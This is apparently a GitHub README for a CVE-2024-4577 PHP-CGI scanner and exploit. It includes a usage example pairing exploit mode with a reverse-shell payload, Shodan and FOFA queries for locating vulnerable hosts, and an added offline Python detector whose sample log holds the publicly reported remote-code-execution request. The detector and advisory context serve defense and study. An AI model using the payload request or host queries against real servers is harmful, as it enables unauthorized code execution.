
CVE-2024-4577 PoC: Argument Injection in PHP-CGI

Associated Vulnerability

Title: Argument Injection in PHP-CGI (CVE-2024-4577)

Description: In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in the command line given to Win32 API functions. The PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to the PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# 🚀 CVE-2024-4577: PHP CGI Argument Injection Scanner and Exploit

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Python 3.6+](https://img.shields.io/badge/python-3.6+-blue.svg)](https://www.python.org/downloads/)
[![CVSS Score](https://img.shields.io/badge/CVSS-9.8-critical)](https://www.first.org/cvss/)

## πŸ›‘οΈ Overview
![image](https://github.com/user-attachments/assets/af8c5025-9e39-42a9-8799-626673463c83)

CVE-2024-4577 is a **critical vulnerability** affecting PHP applications that utilize the **Common Gateway Interface (CGI)**. This tool serves as both a **scanner** and an **exploit**, enabling cybersecurity professionals to:

- Detect PHP CGI Argument Injection flaws
- Exploit vulnerabilities leading to **Remote Code Execution (RCE)**
- Execute arbitrary PHP code on vulnerable systems

## 🔑 Key Features

- **🔍 Vulnerability Detection (`-s`):** scan-only mode that reports which targets are susceptible without running a payload
- **💥 Exploit Functionality (`-e`):** exploits confirmed targets with a payload of your choice
- **🔧 Flexible Payload Management (`-p`):** point the exploit at any PHP payload file for post-exploitation
- **👥 User-Friendly Interface:** simple command-line options with clear, actionable output

## 📦 Installation

```bash
# Clone the repository
git clone https://github.com/your-username/CVE-2024-4577-scanner.git

# Navigate to the project directory
cd CVE-2024-4577-scanner

# Install required dependencies
pip install -r requirements.txt
```

## 📖 Usage

Ensure you have **Python 3** installed on your system. Use the following command structure:

```bash
python3 CVE-2024-4577.py [-h] -t TARGET_FILE [-s] [-e] [-p PAYLOAD_FILE]
```

### Arguments:

- `-h, --help`: Show help message and exit
- `-t TARGET_FILE, --target-file TARGET_FILE`: File containing target URLs (required)
- `-s, --scan`: Perform vulnerability scan only
- `-e, --exploit`: Attempt to exploit the vulnerability
- `-p PAYLOAD_FILE, --payload-file PAYLOAD_FILE`: PHP payload file for exploitation

### Example:

```bash
python3 CVE-2024-4577.py -t targetsite.txt -e -p rev_shell.php
```
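The description above explains the mechanism (a best-fit mapping turns `%AD` into `-` on the php-cgi command line) and the usage section describes a scan mode, but the page shows neither. The block below is an added example written for this page; it is not the repository's `CVE-2024-4577.py` and none of its names, the probe path, the response markers or the sample data come from the project. It runs offline: it simulates the argv that php-cgi would see, builds the read-only `-s` probe a scan mode would send, classifies a response as disclosed source, and flags injection attempts in Apache access-log lines. The 0xAD-to-`-` mapping, the RFC 3875 rule that a query containing an unencoded `=` is not passed as argv, and the two `highlight_file()` markup forms are stated as assumptions in the comments.

```python
# Added example for this page (not the repository's CVE-2024-4577.py).
# It models the php-cgi argument injection behind CVE-2024-4577 offline:
#   1. simulate how a query string becomes php-cgi argv after Windows
#      best-fit maps byte 0xAD (soft hyphen) to ASCII '-',
#   2. build the read-only '-s' (show source) probe a scan mode would send,
#   3. classify a response and flag injection attempts in access-log lines.
# Assumptions not taken from the page: probe path, response markers, the
# regexes, and the sample log lines / response body (all constructed here).
import re
from urllib.parse import urlsplit, unquote_to_bytes

SOFT_HYPHEN = b"\xad"  # U+00AD as one byte; best-fit-mapped to '-' on CP932/936/950


def simulated_php_cgi_argv(query: str) -> list:
    """What php-cgi sees for a '='-free query string on an affected Windows host.

    CGI (RFC 3875 s4.4) splits such a query on '+' and passes the pieces as
    argv; only the 0xAD -> '-' best-fit step is modelled here (assumption:
    it is the one that matters for this CVE).
    """
    argv = []
    for arg in query.split("+"):
        raw = unquote_to_bytes(arg).replace(SOFT_HYPHEN, b"-")
        argv.append(raw.decode("ascii", errors="replace"))
    return argv


def build_source_probe(base_url: str, script: str = "index.php") -> str:
    """URL whose query becomes the php-cgi option '-s' (highlighted source).

    Unlike '-d auto_prepend_file=...', '-s' only reads the script, so it is
    the least destructive way to confirm that the injection works.
    """
    return f"{base_url.rstrip('/')}/{script}?%ADs"


# highlight_file() markup: '<code><span style="color: #' up to PHP 8.2,
# '<pre><code style="color: #' from PHP 8.3 (assumption: these two forms).
SOURCE_MARKERS = (
    re.compile(r'<code><span style="color: #', re.I),
    re.compile(r'<pre><code style="color: #', re.I),
)


def looks_like_source_disclosure(body: str) -> bool:
    """True when the body is PHP's highlighted source, i.e. '-s' took effect."""
    if not any(m.search(body) for m in SOURCE_MARKERS):
        return False
    return "&lt;?php" in body or "<?php" in body


# An argv entry that starts with %AD (any case) plus an option letter, at the
# start of the query or after a '+' separator. A literal '-' is included to
# cover the older CVE-2012-1823 form of the same injection.
INJECTED_OPTION = re.compile(r"(?:^|\+)(?:%ad|-)[a-z]", re.I)


def is_argument_injection(request_target: str) -> bool:
    """Flag request targets whose query would reach php-cgi as options."""
    query = urlsplit(request_target).query
    if "=" in query:
        return False  # RFC 3875 s4.4: an unencoded '=' means no argv passing
    return bool(INJECTED_OPTION.search(query))


LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def flag_log_lines(lines) -> list:
    """Return the request targets of Apache combined-log lines that match."""
    hits = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if m and is_argument_injection(m.group("target")):
            hits.append(m.group("target"))
    return hits


# Constructed sample data (not captured from any real host). The second line
# has the shape of the publicly reported RCE request; the last two are benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jun/2024:10:01:02 +0000] "GET /index.php?%ADs HTTP/1.1" 200 2315 "-" "curl/8.6.0"',
    '203.0.113.5 - - [07/Jun/2024:10:01:03 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 61 "-" "python-requests/2.31"',
    '198.51.100.9 - - [07/Jun/2024:10:02:00 +0000] "GET /index.php?page=home&lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/Jun/2024:10:02:01 +0000] "GET /search.php?q=%AD%AD+dash HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
SAMPLE_DISCLOSED_BODY = (
    '<code><span style="color: #000000">\n'
    '<span style="color: #0000BB">&lt;?php&nbsp;</span>'
    '<span style="color: #007700">echo&nbsp;</span>'
    '<span style="color: #DD0000">"hi"</span><span style="color: #007700">;</span>\n'
    '</span>\n</code>'
)

if __name__ == "__main__":
    print(simulated_php_cgi_argv("%ADd+allow_url_include%3d1"))
    print(build_source_probe("https://example.test"))
    print(looks_like_source_disclosure(SAMPLE_DISCLOSED_BODY))
    for target in flag_log_lines(SAMPLE_LOG):
        print("argument injection:", target)
```

Two caveats when turning this into a live scan. The probe only confirms anything if the target actually runs PHP as CGI on Windows with an affected code page; a PHP-FPM or mod_php host returns the normal page and the check correctly reports nothing. And the log check keys on the `%AD` byte because that is what the interim rule in the PHP release announcement blocks (`RewriteCond %{QUERY_STRING} ^%ad [NC]` followed by `RewriteRule .? - [F,L]`, quoted as published there); on a patched build (8.1.29, 8.2.20, 8.3.8) such requests are still worth alerting on as reconnaissance.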

## πŸ” Discovering Vulnerable Hosts

Utilize powerful search engines to identify potentially vulnerable hosts:

### 🌐 Shodan Query

Search for servers running PHP versions 8.1, 8.2, and 8.3:

```
server: PHP 8.1, server: PHP 8.2, server: PHP 8.3, html:"phpinfo"
```

### 🌐 FOFA Query

```
protocol="http" && (header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3")
```

## ⚠️ Disclaimer

This tool is intended for authorized security testing and research purposes only. Ensure you have explicit permission before scanning or attempting to exploit any systems you do not own or have the right to test.

## 📞 Support

If you encounter any issues or have questions, please file an issue on the GitHub issue tracker.

---
File Snapshot

```
CVE-2024-4577.py  (4.5K)
README.md         (2.9K)
```

0 directories, 2 files